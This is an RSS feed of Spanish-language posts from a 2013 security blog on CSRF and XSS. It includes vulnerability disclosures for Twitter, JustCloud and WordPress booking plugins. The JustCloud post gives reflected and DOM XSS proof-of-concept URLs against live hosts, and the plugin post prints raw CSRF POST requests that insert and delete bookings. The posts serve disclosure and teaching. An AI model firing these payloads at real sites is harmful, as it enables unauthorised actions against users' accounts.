<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>WebSecurityDev &#187; CSRF</title>
	<atom:link href="/tag/csrf/feed/" rel="self" type="application/rss+xml" />
	<link>https://websecuritydev.com</link>
	<description>WebSecurityDev , Seguridad Informática, Empresa Colombiana con Servicios de Pentesting, Growth Hacking, Social Media Strategy, Desarrollo Web y Hosting.</description>
	<lastBuildDate>Mon, 01 Dec 2014 04:55:34 +0000</lastBuildDate>
	<language>es-ES</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=4.1.1</generator>
	<item>
		<title>CSRF: Un Nuevo Target.</title>
		<link>https://websecuritydev.com/csrf-un-nuevo-target/</link>
		<comments>https://websecuritydev.com/csrf-un-nuevo-target/#comments</comments>
		<pubDate>Sun, 15 Sep 2013 23:45:24 +0000</pubDate>
		<dc:creator><![CDATA[dylan]]></dc:creator>
				<category><![CDATA[Blog]]></category>
		<category><![CDATA[ataque de CSRF]]></category>
		<category><![CDATA[cross site request forgery]]></category>
		<category><![CDATA[CSRF]]></category>
		<category><![CDATA[Dylan Irzi]]></category>
		<category><![CDATA[seguridad]]></category>
		<category><![CDATA[Tipos de CSRF]]></category>
		<category><![CDATA[Tutoriales]]></category>
		<category><![CDATA[WebSecurity Dev]]></category>

		<guid isPermaLink="false">https://websecuritydev.com/?p=174</guid>
		<description><![CDATA[<p>Hace poco Conocí realmente como funcionaba un ataque de CSRF, Pero todo en la vida Cada día aprendes algo nuevo. Y no sé si soy el único pero en esto...</p>
<p>The post <a rel="nofollow" href="/csrf-un-nuevo-target/">CSRF: Un Nuevo Target.</a> appeared first on <a rel="nofollow" href="/">WebSecurityDev</a>.</p>
]]></description>
				<content:encoded><![CDATA[<p>Hace poco Conocí realmente como funcionaba un <b>ataque de CSRF, </b>Pero todo en la vida Cada día aprendes algo nuevo. Y no sé si soy el único pero en esto me eh encontrado con situación realmente llamémosla “Interesante”.</p>
<p>Este post es para para compartir con ustedes, mi experiencias. Quizás le ayude a alguien más. Que este empezando a juguetear con esta vulnerabilidad Web.</p>
<p><span id="more-174"></span></p>
<p>Bueno empecemos Que es <b>Ataque CSRF:</b></p>
<p>Un ataque CSRF fuerza al navegador web validado de una víctima a enviar una petición a una aplicación web vulnerable, la cual entonces realiza la acción elegida a través de la víctima. Al contrario que en los ataques XSS, los cuales explotan la confianza que un usuario tiene en un sitio en particular, el <b>cross site request forgery</b> explota la confianza que un sitio tiene en un usuario en particular.</p>
<p>Ahora bien contare lo que hasta el momento me eh encontrado.</p>
<p>Básicamente me eh topado con <b>3</b> Tipos <b>CSRF.</b></p>
<p><b> </b><b>Tipo 1:</b></p>
<p>Este básicamente es más elemental de todos, es el Formulario que no tiene <b>token</b>. La cual está confiado en que la petición del usuario es realmente de él, y no es una petición forzada.</p>
<p>Ejemplo:</p>
<p><a href="/wp-content/uploads/2013/09/CSRF.png" rel="prettyPhoto[gallery-cV3Q]"><img class="aligncenter size-full wp-image-178" src="/wp-content/uploads/2013/09/CSRF.png" alt="CSRF" width="601" height="501" /></a></p>
<p><b><i>[Captura de Imagen de Live HTTP Header; Plugin de Firefox que Uso para Editar Cabeceras y detectar CSRF]</i></b></p>
<p>Ahora Bien este es el más fácil de todos por que tan solo resta armar la PoC [Prueba de Concepto] y Bang! <b>CSRF.</b></p>
<ul>
<li><b>Tipo 2.</b></li>
</ul>
<p>Ahora pasamos al que yo denomino tipo 2, Este CSRF Que aun teniendo protección no sirve para nada, solo de “ <b>lujo</b> “ una prueba de Ello: <b>Twitter </b>, Hace unas semana encontré un hueco de seguridad que sin el uso de token las peticiones se iban. La cual permitía que yo armara un HTML y lo enviase a un víctima y este lo abriera y yo tomar el control de su cuenta, todo esto de manera oculta para él. Una Gran Brecha de seguridad,  y pensar que este fallo ya lo eh visto el múltiples <b>Aplicativos Web</b>. Algunos ya eh reportado y otros apenas iré a reportar, de todas maneras es un fallo, no verificar los tokens enviados por el usuario, y dejar sin verificación los tokens. ( <a href="/hackeando-el-twitter-con-un-click/">Hackeando Twitter Con Un Click</a> )</p>
<p style="text-align: center;"><a href="/wp-content/uploads/2013/09/csrf-2.png" rel="prettyPhoto[gallery-cV3Q]"><img class="aligncenter  wp-image-175" src="/wp-content/uploads/2013/09/csrf-2-1024x525.png" alt="csrf 2" width="576" height="295" /></a></p>
<p><b>[Exploit CSRF De Twitter – Captura de la HTML De Prueba de Concepto]</b></p>
<ul>
<li><strong>Tipo 3:</strong></li>
</ul>
<p>Este Tipo de CSRF es muy Extraño, la verdad eh buscado información al respecto y no encuentro alguna, igual quiero presentárselas acá y si tienen alguna duda, Ps esto lo que tengo al respecto.</p>
<p>Este CSRF Se basa en autentificar el token en las cabeceras, si bien debes modificar la cookie para obtener la prueba de concepto opino que no es imposible de realizar, y estoy en desarrollo de su PoC.</p>
<p>Le daré un ejemplo para que entiendan mejor:</p>
<p><a href="/wp-content/uploads/2013/09/CSRF-32.png" rel="prettyPhoto[gallery-cV3Q]"><img class="aligncenter size-full wp-image-177" src="/wp-content/uploads/2013/09/CSRF-32.png" alt="CSRF 32" width="532" height="385" /></a></p>
<p><b>[CSRF Con Token Modificable]</b></p>
<p><a href="/wp-content/uploads/2013/09/CSRF-3.png" rel="prettyPhoto[gallery-cV3Q]"><img class="aligncenter size-full wp-image-176" src="/wp-content/uploads/2013/09/CSRF-3.png" alt="CSRF 3" width="540" height="451" /></a></p>
<p>Ahora si Yo modificase <b>Token </b>de seguridad, Que se encontrase en header y lo pongo de igual manera formulario que estoy enviando, la petición se realiza de manera exitosa.</p>
<p>Pero si el <b>token</b> del header que está en cookie,  lo modifico y el token que está en formulario no le realizo ningún cambio. Efectivamente la petición es rechazada por el servidor.</p>
<p>Y esto es debido que la comprobación de token la compara desde el servidor sino desde las mismas cabeceras y esto representa un riesgo. 1. Por qué no debes dejar que el token sea un valor modificable, si el usuario lo modifica lo que debería pasar es rechazarlo, 2. Porque la comprobación de token la estas dejando a vista del usuario.</p>
<p>Ahora como explique arriba es muy complejo armar la PoC, pero no imposible <strong>3:)</strong></p>
<p><strong> ** Actualizacion: https://apigee.com/console/</strong></p>
<p><strong> **Permite por medio de la consola editar parametros de cabezera, tocara juguetear un poco.</strong></p>
<p>&nbsp;</p>
<p>Bueno ya con esto concluyo este post, la verdad fue un placer compartir esta información con todos.</p>
<p>Y bueno cabe aclarar que lo escrito de manera anterior es mi punto de vista de ver los ataques de <strong>CSRF,</strong> y los dividos de esa manera. Espero que le haya gustado!</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p><b>By Dylan Irzi</b></p>
<p><b>Security Researcher.</b></p>
<p><b>WebSecurityDev</b></p>
<p>&nbsp;</p>
<p>The post <a rel="nofollow" href="/csrf-un-nuevo-target/">CSRF: Un Nuevo Target.</a> appeared first on <a rel="nofollow" href="/">WebSecurityDev</a>.</p>
]]></content:encoded>
			<wfw:commentRss>https://websecuritydev.com/csrf-un-nuevo-target/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Hackeando el Twitter Con Un Click.</title>
		<link>https://websecuritydev.com/hackeando-el-twitter-con-un-click/</link>
		<comments>https://websecuritydev.com/hackeando-el-twitter-con-un-click/#comments</comments>
		<pubDate>Wed, 04 Sep 2013 23:43:13 +0000</pubDate>
		<dc:creator><![CDATA[dylan]]></dc:creator>
				<category><![CDATA[Blog]]></category>
		<category><![CDATA[Colombia]]></category>
		<category><![CDATA[CSRF]]></category>
		<category><![CDATA[Dylan Irzi]]></category>
		<category><![CDATA[Exploit]]></category>
		<category><![CDATA[Hackeando]]></category>
		<category><![CDATA[Hacker]]></category>
		<category><![CDATA[Juan David Castro Cantillo]]></category>
		<category><![CDATA[Movile Devices]]></category>
		<category><![CDATA[seguridad]]></category>
		<category><![CDATA[Twitter]]></category>
		<category><![CDATA[WebSecurityDev]]></category>

		<guid isPermaLink="false">https://websecuritydev.com/?p=167</guid>
		<description><![CDATA[<p>Buenas Noches mis lectores, tenia rato sin escribir, el trabajo , el estudio y mi novia me mantiene ocupado pero aqui volvi para compartirle uno de mis ultimos reportes. El...</p>
<p>The post <a rel="nofollow" href="/hackeando-el-twitter-con-un-click/">Hackeando el Twitter Con Un Click.</a> appeared first on <a rel="nofollow" href="/">WebSecurityDev</a>.</p>
]]></description>
				<content:encoded><![CDATA[<p>Buenas Noches mis lectores, tenia rato sin escribir, el trabajo , el estudio y mi novia me mantiene ocupado pero aqui volvi para compartirle uno de mis ultimos reportes.</p>
<p>El dia de ayer a al las 3:40 pm encontre un <strong>CSRF</strong> en Twitter ,la cual mas tarde me di cuenta que aplicaba a todo. este <strong>CSRF </strong> Permitia que a partir de un link enviado de una cuenta atacante a una cuenta victima fuece hackeada !</p>
<p>realize multiples pruebas y todas salieron positivas , logre grabar un video y al final lo podra vizualizar.</p>
<p>Lo que me sorprendio fue que a las 10 am  de la mañana  (Hora Colombiana ) de dia de hoy  ( 04/09/13 ). Al seguir buscando vulnerabilidades en Twitter esta misma vulnerabilidad de <strong>CRSF</strong> Aplicaba para todo! , realize multiples PoC, <strong>en una logre &#8220;trinar&#8221;, en otra retweetear, en otra cambie el nombre del perfil, en otra la descripcion, todo esto con un simple archivo de html.</strong></p>
<p><strong>Como llege hasta la vulnerabilidad?</strong> estaba leyendo un articulo de mecanismo de doble autentificacion con tu numero de celular decidi intentarlo y mirar las cabezeras y probe eliminando token de seguridad que este tenia y wala! funciono.!</p>
<p>Esta vulnerabilidad consistia en que aun sin tener el token de seguridad valido , la operacion que se estaba solicitando se realizaba. en pocas palabras el token que tenia antes no funcionaba! estaba de lujo. por que esta aunque la borrase de la peticion, la peticion se ejecutaba.</p>
<p>Empezemos con el Reporte.</p>
<p><strong>Titulo: CSRF En Twitter.com</strong></p>
<p>Acerca del Autor: <strong>Dylan Irzi &#8211; Juan David Castro Cantillo. &#8211; Colombiano. </strong></p>
<p><strong>Independent Security Researcher de 17 años de edad, Con Hall Of Fame Owncloud, Microsoft / Adobe .</strong><br />
<strong>De la Ciudad de Barranquilla.</strong></p>
<p>A Quien Afectaban: A Todos los usuarios.</p>
<p>Estatus de la Vulnerabilidad: <strong>Fixed!</strong></p>
<p>Video de Prueba de Concepto:</p>
<p><iframe src="//www.youtube.com/embed/g5Mv_7-NcBE" height="315" width="560" allowfullscreen="" frameborder="0"></iframe></p>
<p>Bueno depues de eso a las 4 de la tarde hora colombiana, se puso en modo mantemiento para reparar supongo que la vulnerabilidad.</p>
<p><a href="/wp-content/uploads/2013/09/ESTATUS.png" rel="prettyPhoto[gallery-p20E]"><img class="aligncenter size-full wp-image-168" alt="ESTATUS" src="/wp-content/uploads/2013/09/ESTATUS.png" width="650" height="404" /></a><strong>Correo de Confirmacion y reparacion de vulnerabilidad.</strong></p>
<p><a href="/wp-content/uploads/2013/09/Twitter-fixed.png" rel="prettyPhoto[gallery-p20E]"><img class="aligncenter size-large wp-image-169" alt="Twitter fixed" src="/wp-content/uploads/2013/09/Twitter-fixed-1024x105.png" width="960" height="98" /></a></p>
<p>Eso ha sido todo el informe. la verdad ahora solo queda esperar que me coloquen en <strong>Hall Of Fame</strong> De  Twitter por WhiteHat. que segun el mail sera en unos dias.</p>
<p>Por Ultimo Agradecer a <strong>@SeguridadBlanca, @SrtadeDylan</strong>, <s>@</s><b>Armand0A , <s>@</s>Maldonad_Jeison, Por ayudarme Probar las PoC.</b><br />
al <strong>Equipo de WebSecurityDev, y a Dios.</strong></p>
<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;</p>
<p><strong>Att: Dylan Irzi</strong></p>
<p><strong>Independent Security Researche. </strong></p>
<p><strong>Happy Hacking!</strong></p>
<p>The post <a rel="nofollow" href="/hackeando-el-twitter-con-un-click/">Hackeando el Twitter Con Un Click.</a> appeared first on <a rel="nofollow" href="/">WebSecurityDev</a>.</p>
]]></content:encoded>
			<wfw:commentRss>https://websecuritydev.com/hackeando-el-twitter-con-un-click/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Pentesting a JustCloud. Un servicio de espacio en la nube.</title>
		<link>https://websecuritydev.com/pentesting-justcloud-un-servicio-de-espacio-en-la-nube/</link>
		<comments>https://websecuritydev.com/pentesting-justcloud-un-servicio-de-espacio-en-la-nube/#comments</comments>
		<pubDate>Thu, 22 Aug 2013 20:22:20 +0000</pubDate>
		<dc:creator><![CDATA[dylan]]></dc:creator>
				<category><![CDATA[Blog]]></category>
		<category><![CDATA[CSRF]]></category>
		<category><![CDATA[Exploit]]></category>
		<category><![CDATA[Full Diclosure]]></category>
		<category><![CDATA[JustCloud]]></category>
		<category><![CDATA[Nube]]></category>
		<category><![CDATA[XSS]]></category>

		<guid isPermaLink="false">https://websecuritydev.com/?p=163</guid>
		<description><![CDATA[<p>Hola!  a Todos.. pensando en que iba a publicar.. para hoy. decidí pensar en mis antiguos mails. y revisándolos encontre un reporte de Fallo de seguridad sin respuesta. Si, el...</p>
<p>The post <a rel="nofollow" href="/pentesting-justcloud-un-servicio-de-espacio-en-la-nube/">Pentesting a JustCloud. Un servicio de espacio en la nube.</a> appeared first on <a rel="nofollow" href="/">WebSecurityDev</a>.</p>
]]></description>
				<content:encoded><![CDATA[<p>Hola!  a Todos.. pensando en que iba a publicar.. para hoy.<br />
decidí pensar en mis antiguos mails. y revisándolos encontre un reporte de Fallo de seguridad sin respuesta. Si, el <b>10 de Abril </b>realize un reporte al equipo de<b> JustCloud</b>. y hasta el sol de hoy no me han respondido. pero tranquilos que ellos ven el post y en unas semanas estará todo fixed.</p>
<div>
<div><a href="http://4.bp.blogspot.com/-FDm3xZoTXnk/UhZt2rSH-fI/AAAAAAAAAWQ/o49kWpKhHyg/s1600/Report.PNG" rel="prettyPhoto[gallery-3xLS]"><img alt="" src="https://4.bp.blogspot.com/-FDm3xZoTXnk/UhZt2rSH-fI/AAAAAAAAAWQ/o49kWpKhHyg/s640/Report.PNG" width="640" height="182" border="0" /></a></div>
<p>Bueno empezemos.<br />
Url Target: <b>justcloud.com</b><br />
<b>                  my.justcloud.com</b></p>
<p>Vulnerabilidad Encontrada:</p>
<ul>
<li><b>Paraiso Cross Site Scripting ( Reflected &#8211; Persistente &#8211; DOM)</b></li>
<li><b>CSRF &#8211; XSRF</b></li>
</ul>
<p>Okey. Bueno os cuento como llegue allí. hace un tiempo testeado algunos servicios de espacio en la nube me tope con este servicio. pero lo que se me hace &#8220;chistoso&#8221; es que no contaba con una <a href="/seguridad/"><b>auditoría de seguridad</b></a> adecuada. En ese tiempo testé unos 5 Portales de Almancenamiento en la nube. acá otro post &#8220;<a href="/la-anecdota-de-un-cross-site-scripting-en-box-com/">Anécdota de un XSS</a>&#8220;.<br />
Bueno empezemos con <b>Cross Site Scripting Refleted: </b><br />
<a href="https://my.justcloud.com/devices/%22%3E%22%3E%3Cimg%20src=x%20onerror=alert%28document.write%29;%3E">https://my.justcloud.com/devices/%22%3E%22%3E%3Cimg%20src=x%20onerror=alert%28document.write%29;%3E</a><br />
en esa y en 10 mil lugares mas !!.. okey como en 8 o 9 ubicaciones mas..</p>
<div><a href="http://3.bp.blogspot.com/-y15sw2rph04/UhZoBrA8_dI/AAAAAAAAAVo/8dzWnEVSCC4/s1600/Refletedxss.PNG" rel="prettyPhoto[gallery-3xLS]"><img alt="" src="https://3.bp.blogspot.com/-y15sw2rph04/UhZoBrA8_dI/AAAAAAAAAVo/8dzWnEVSCC4/s640/Refletedxss.PNG" width="640" height="202" border="0" /></a></div>
<p>Bueno Pasamos a <b>Cross Site Scripting Persistente: </b><br />
Esta esta localizada en la parte del <b>perfil </b>en donde al cambiar el numero del telefono por un vector Cross site scripting este Automaticamente. queda interno en la cuenta.</p>
<div><a href="http://4.bp.blogspot.com/-Yw49ZzoO3f0/UhZomxcYxiI/AAAAAAAAAVw/4SyNvoILr68/s1600/XSS+Just+Cloud.PNG" rel="prettyPhoto[gallery-3xLS]"><img alt="" src="https://4.bp.blogspot.com/-Yw49ZzoO3f0/UhZomxcYxiI/AAAAAAAAAVw/4SyNvoILr68/s640/XSS+Just+Cloud.PNG" width="640" height="330" border="0" /></a></div>
<p>Ahora Pasamos a <b>DOM</b>! Unos de mis favoritos! jejej.<br />
este se encuentra en dominio principal. y se debe al mal implementacion de &#8220;location&#8221; del Js.<br />
revisando un poco del codigo:</p>
<div><a href="http://2.bp.blogspot.com/-7zbnfrZk2ao/UhZpVbxmfJI/AAAAAAAAAV8/c8zaMioTYlo/s1600/Code.PNG" rel="prettyPhoto[gallery-3xLS]"><img alt="" src="https://2.bp.blogspot.com/-7zbnfrZk2ao/UhZpVbxmfJI/AAAAAAAAAV8/c8zaMioTYlo/s640/Code.PNG" width="640" height="326" border="0" /></a></div>
<p>y como era de esperarse todo script puesto junto &#8220;#&#8221; ejecutaba!<br />
<a href="http://www.justcloud.com/terms#%22%3E%3Cimg%20src=x%20onerror=prompt%28%22xss%22%29;%3E">http://www.justcloud.com/terms#%22%3E%3Cimg%20src=x%20onerror=prompt%28%22xss%22%29;%3E </a></p>
<div><a href="http://1.bp.blogspot.com/-QrA5mERQhTY/UhZqBoW1ElI/AAAAAAAAAWE/uXq3nq3dUZY/s1600/Just+dom.PNG" rel="prettyPhoto[gallery-3xLS]"><img alt="" src="https://1.bp.blogspot.com/-QrA5mERQhTY/UhZqBoW1ElI/AAAAAAAAAWE/uXq3nq3dUZY/s640/Just+dom.PNG" width="640" height="328" border="0" /></a></div>
<p>Tambien realize un PoC para cambiar la contraseña por medio de html pero Dejare esto hasta aqui. yo creo que ya quedo claro que la platforma es vulnerable a 100!<br />
Arriba habia dicho que no contaba con auditoria de seguridad y esto lo digo ps muy facil hoy le pase el escaner de seguridad <b>Acunetix</b>. aunque no me confio en sus resultados ( <a href="/acunetix-web-scanner-es-realmente-confiable/">Es Seguro Acunetix?</a> ) Pero Decidi hacerlo y fue lo que me esperaba..</p>
<div><a href="http://3.bp.blogspot.com/-UmcLBTEsYUc/UhZmbbxgeFI/AAAAAAAAAVc/ATr7Psce2uA/s1600/Acunetix+escanner.PNG" rel="prettyPhoto[gallery-3xLS]"><img alt="" src="https://3.bp.blogspot.com/-UmcLBTEsYUc/UhZmbbxgeFI/AAAAAAAAAVc/ATr7Psce2uA/s640/Acunetix+escanner.PNG" width="640" height="271" border="0" /></a></div>
<ul>
<li>44 Cross Site Scripting</li>
<li>Fomularios sin Proteccion de CSRF.</li>
<li>y El escaner apenas estaba en 11% si lo dejo que corra al hasta 100 creo que encontrara un SQL.</li>
</ul>
<p>Bueno antes de terminar tambien les dejo el login a la plataforma que tambien es vulnerable<br />
Login: <a href="https://login.justcloud.com/">https://login.justcloud.com/ </a><br />
Demo: <a href="https://partner.justcloud.com/login?demo=true" rel="nofollow">https://partner.justcloud.com/login?demo=true </a></p>
<p>Bueno, ya para concluir, la verdad es inaceptable que una plataforma web de almacenamiento en la nube tenga tantas falencias de seguridad, ademas de que el servicio es pago! (Gratis solo por 15 Dias ) por que no realizaron las auditorias de seguridad <img src="/wp-includes/images/smilies/icon_neutral.gif" alt=":|" class="wp-smiley" /> bueno. con esto los dejo pensando.</p>
<p><b>Happy Hacking!!</b></p>
<p><b>Dylan Irzi. </b><br />
<b>WebSucurityDev.com</b></p>
</div>
<p>The post <a rel="nofollow" href="/pentesting-justcloud-un-servicio-de-espacio-en-la-nube/">Pentesting a JustCloud. Un servicio de espacio en la nube.</a> appeared first on <a rel="nofollow" href="/">WebSecurityDev</a>.</p>
]]></content:encoded>
			<wfw:commentRss>https://websecuritydev.com/pentesting-justcloud-un-servicio-de-espacio-en-la-nube/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>CSRFTester En Accion&#8230;</title>
		<link>https://websecuritydev.com/csrftester-en-accion/</link>
		<comments>https://websecuritydev.com/csrftester-en-accion/#comments</comments>
		<pubDate>Sun, 18 Aug 2013 01:57:14 +0000</pubDate>
		<dc:creator><![CDATA[dylan]]></dc:creator>
				<category><![CDATA[Blog]]></category>
		<category><![CDATA[Aplicacion]]></category>
		<category><![CDATA[CSRF]]></category>
		<category><![CDATA[CSRFTester]]></category>
		<category><![CDATA[Dylan Irzi]]></category>
		<category><![CDATA[Pentester]]></category>
		<category><![CDATA[seguridad]]></category>
		<category><![CDATA[Tutorial]]></category>
		<category><![CDATA[WebSecurityDev]]></category>
		<category><![CDATA[XSRF Attack]]></category>

		<guid isPermaLink="false">https://websecuritydev.com/?p=156</guid>
		<description><![CDATA[<p>Bueno Hoy decidi hacer un tutorial de CSRFTester en accion de como usar el aplicacion de CSRFTester 1.0 y algo mas&#8230;</p>
<p>The post <a rel="nofollow" href="/csrftester-en-accion/">CSRFTester En Accion&#8230;</a> appeared first on <a rel="nofollow" href="/">WebSecurityDev</a>.</p>
]]></description>
				<content:encoded><![CDATA[<p>Bueno Hoy decidi hacer un tutorial de CSRFTester en accion de como usar el aplicacion de CSRFTester 1.0 y algo mas&#8230;</p>
<p><iframe width="420" height="315" src="//www.youtube.com/embed/7wJl7RHJbSA" frameborder="0" allowfullscreen></iframe></p>
<p>The post <a rel="nofollow" href="/csrftester-en-accion/">CSRFTester En Accion&#8230;</a> appeared first on <a rel="nofollow" href="/">WebSecurityDev</a>.</p>
]]></content:encoded>
			<wfw:commentRss>https://websecuritydev.com/csrftester-en-accion/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>CSRF Plugin Booking Calendar 4.1.4 &#8211; WordPress</title>
		<link>https://websecuritydev.com/csrf-plugin-booking-calendar-4-1-4-wordpress/</link>
		<comments>https://websecuritydev.com/csrf-plugin-booking-calendar-4-1-4-wordpress/#comments</comments>
		<pubDate>Thu, 25 Jul 2013 22:07:13 +0000</pubDate>
		<dc:creator><![CDATA[dylan]]></dc:creator>
				<category><![CDATA[Blog]]></category>
		<category><![CDATA[CSRF]]></category>
		<category><![CDATA[Dylan Irzi]]></category>
		<category><![CDATA[Exploit]]></category>
		<category><![CDATA[WebSecurityDev]]></category>
		<category><![CDATA[Wordpress]]></category>

		<guid isPermaLink="false">https://websecuritydev.com/?p=144</guid>
		<description><![CDATA[<p>Hola A Todos mis lectores! Eh estado en las ultimas semana reportando fallos de Cross site scripting y se me ha olvidado mi antiguo laboratorio, Localhost. Pero hasta la semana...</p>
<p>The post <a rel="nofollow" href="/csrf-plugin-booking-calendar-4-1-4-wordpress/">CSRF Plugin Booking Calendar 4.1.4 &#8211; WordPress</a> appeared first on <a rel="nofollow" href="/">WebSecurityDev</a>.</p>
]]></description>
				<content:encoded><![CDATA[<p><strong>Hola A Todos mis lectores!</strong></p>
<p>Eh estado en las ultimas semana reportando fallos de <strong>Cross site scripting</strong> y se me ha olvidado mi antiguo laboratorio, Localhost. Pero hasta la semana pasada que tome el tiempo de fincho ( fin de semana ) para volver a usar plugins y buscar vulneabilidades como en viejos tiempos&#8230;</p>
<p>entonces revisando nuevos plugins en <strong>WordPress</strong> encontre un plugins de calendario. <strong>Booking Calendar 4.1.4</strong>,<strong> </strong>Y al hacer el proseso de prueba me dio buenos resultados.</p>
<p>Este plugin Trabaja con ajax, pero no maneja &#8220;token&#8221; lo cual eh alli el grave error, permitiendo asi Que modificando las cabezeras y enviando contenido por <strong>POST</strong>, sea capaz de realizar modificaciones a la base de datos. esta maneja una tabla especialmente para ella. &#8220;<strong>wp_booking</strong> &#8221;</p>
<p>Ese dia. no puede haber nada mejor &#8221; <strong>Firefox , Live HTTP Header, Firebug y tu Mente para realizar todo las pruebas con ese plugin</strong>&#8221;</p>
<p>El resultado : <strong>Cross-Site Request Forgery For POST.</strong></p>
<p>Ahora que recuerdo NO Intente si era vulnerable a <strong>POST SQLi Injeccion</strong>, :/ Creo que ese dia ya estaba full cansado en la noche para seguir en la prueba. igual si alguien os desea puede seguir mi y completar la labor con ese plugin.</p>
<p>En resumen aqui les dejo el Video!<br />
<iframe src="//www.youtube.com/embed/xfyP83NIVnM" height="315" width="560" allowfullscreen="" frameborder="0"></iframe></p>
<p><strong>A continuacion el primer codigo del exploit. para añadir un evento al calendario.</strong></p>
[code]POST:<br />
Host: localhost<br />
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0 AlexaToolbar/alxf-2.18<br />
Accept: */*<br />
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3<br />
Accept-Encoding: gzip, deflate<br />
Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />
X-Requested-With: XMLHttpRequest<br />
Referer: http://localhost/wordpress/wp-admin/admin.php?page=booking/wpdev-booking.phpwpdev-booking-reservation<br />
Content-Length: 311<br />
Connection: keep-alive<br />
Pragma: no-cache<br />
Cache-Control: no-cache</p>
<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;<br />
ajax_action=INSERT_INTO_TABLE&amp;bktype=1&amp;dates=(DATE)&amp;form=text%5Ename1%5Etest~text%5Esecondname1%5Etest~email</p>
<p>%5Eemail1%5test%40gmail.com~text%5Ephone1%5Etest~textarea</p>
<p>%5Edetails1%5Etest&amp;captcha_chalange=&amp;captcha_user_input=&amp;is_send_emeils=1&amp;my_booking_hash=&amp;booking_form_type=&amp;wpdev</p>
<p>_active_locale=es_ES[/code]
[code]Delete:<br />
Url: http://localhost/wordpress/wp-content/plugins/booking/wpdev-booking.php</p>
<p>Post:<br />
Host: localhost<br />
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0 AlexaToolbar/alxf-2.18<br />
Accept: */*<br />
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3<br />
Accept-Encoding: gzip, deflate<br />
Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />
X-Requested-With: XMLHttpRequest<br />
Referer: http://localhost/wordpress/wp-admin/admin.php?page=booking/wpdev-booking.phpwpdev-</p>
<p>booking&amp;wh_booking_id=4&amp;view_mode=vm_listing&amp;tab=actions<br />
Content-Length: 104<br />
Connection: keep-alive<br />
Pragma: no-cache<br />
Cache-Control: no-cache</p>
<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;</p>
<p>ajax_action=DELETE_APPROVE&amp;booking_id=4&amp;is_send_emeils=1&amp;denyreason=&amp;user_id=1&amp;wpdev_active_locale=es_ES</p>
<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;[/code]
<p>The post <a rel="nofollow" href="/csrf-plugin-booking-calendar-4-1-4-wordpress/">CSRF Plugin Booking Calendar 4.1.4 &#8211; WordPress</a> appeared first on <a rel="nofollow" href="/">WebSecurityDev</a>.</p>
]]></content:encoded>
			<wfw:commentRss>https://websecuritydev.com/csrf-plugin-booking-calendar-4-1-4-wordpress/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Exploit WordPress – CP Reservation Calendar 1.01 CSRF y XSS Persistent.</title>
		<link>https://websecuritydev.com/exploit-wordpress-cp-reservation-calendar-1-01-csrf-y-xss-persistent/</link>
		<comments>https://websecuritydev.com/exploit-wordpress-cp-reservation-calendar-1-01-csrf-y-xss-persistent/#comments</comments>
		<pubDate>Sat, 22 Jun 2013 18:29:48 +0000</pubDate>
		<dc:creator><![CDATA[dylan]]></dc:creator>
				<category><![CDATA[Blog]]></category>
		<category><![CDATA[CP Reservation Calendar]]></category>
		<category><![CDATA[CSRF]]></category>
		<category><![CDATA[Exploit]]></category>
		<category><![CDATA[Plugin]]></category>
		<category><![CDATA[seguridad]]></category>
		<category><![CDATA[WebSecurityDev]]></category>
		<category><![CDATA[Wordpress]]></category>
		<category><![CDATA[XSS]]></category>

		<guid isPermaLink="false">https://websecuritydev.com/?p=122</guid>
		<description><![CDATA[<p>Saludos a todos! la comunidad WebSecurityDev, Estavez le traigo un video de mi investigacion de seguridad de hace unos meses. Que hasta hoy eh decidido publicar. CP Reservation Calendar 1.01...</p>
<p>The post <a rel="nofollow" href="/exploit-wordpress-cp-reservation-calendar-1-01-csrf-y-xss-persistent/">Exploit WordPress – CP Reservation Calendar 1.01 CSRF y XSS Persistent.</a> appeared first on <a rel="nofollow" href="/">WebSecurityDev</a>.</p>
]]></description>
				<content:encoded><![CDATA[<p>Saludos a todos! la comunidad <strong>WebSecurityDev</strong>, Estavez le traigo un video de mi investigacion de <strong>seguridad</strong> de hace unos meses. Que hasta hoy eh decidido publicar.</p>
<figure id="attachment_855"><a href="/blog/wp-content/uploads/2013/04/cp-calendario.png" rel="prettyPhoto[gallery-DTm9]"><img alt="CP Reservation Calendar Hacked" src="/blog/wp-content/uploads/2013/04/cp-calendario.png" width="654" height="412" /></a><figcaption>CP Reservation Calendar 1.01 Hacked</figcaption></figure>
<p><strong>El Exploit esta actualmente Funcionando. Espero que disfruten y ahora Tenemos Canal de Youtube!</strong></p>
